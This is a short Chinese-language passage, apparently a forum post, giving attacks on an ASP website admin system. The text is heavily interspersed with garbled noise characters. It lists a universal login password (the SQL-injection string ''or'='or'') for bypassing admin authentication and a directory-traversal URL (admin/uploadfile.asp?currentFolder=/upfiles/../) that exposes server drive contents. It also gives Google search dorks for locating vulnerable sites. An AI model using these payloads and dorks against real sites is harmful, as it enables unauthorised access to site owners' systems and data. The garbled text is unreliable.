后台万能密码 'or'='or'& h4 d) O9 C/ X1 ?& r: e- n5 r
1 C& K2 g" p* C5 C, r, B1 X! [! L后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!$ ]. @( Z2 i7 F: W
admin/uploadfile.asp?currentFolder=/upfiles/../
' G! W# c1 P) P1 t' M$ i+ q
# T* n' ^$ v1 ^/ R1 t+ p9 {' K# L4 I/ w漏洞证明:; h1 E+ k5 @1 b
0 b& y& j. r: g4 e# G6 G# V谷歌:inurl:type.asp?id=1 新闻中心
+ ? U U/ M- W- E$ P1 E/ A' X' ?9 o; a或者 :inurl:download_ok.asp?7 \$ C" i) t% Z1 P
6 A% C: r; E3 ]: I2 n. [ |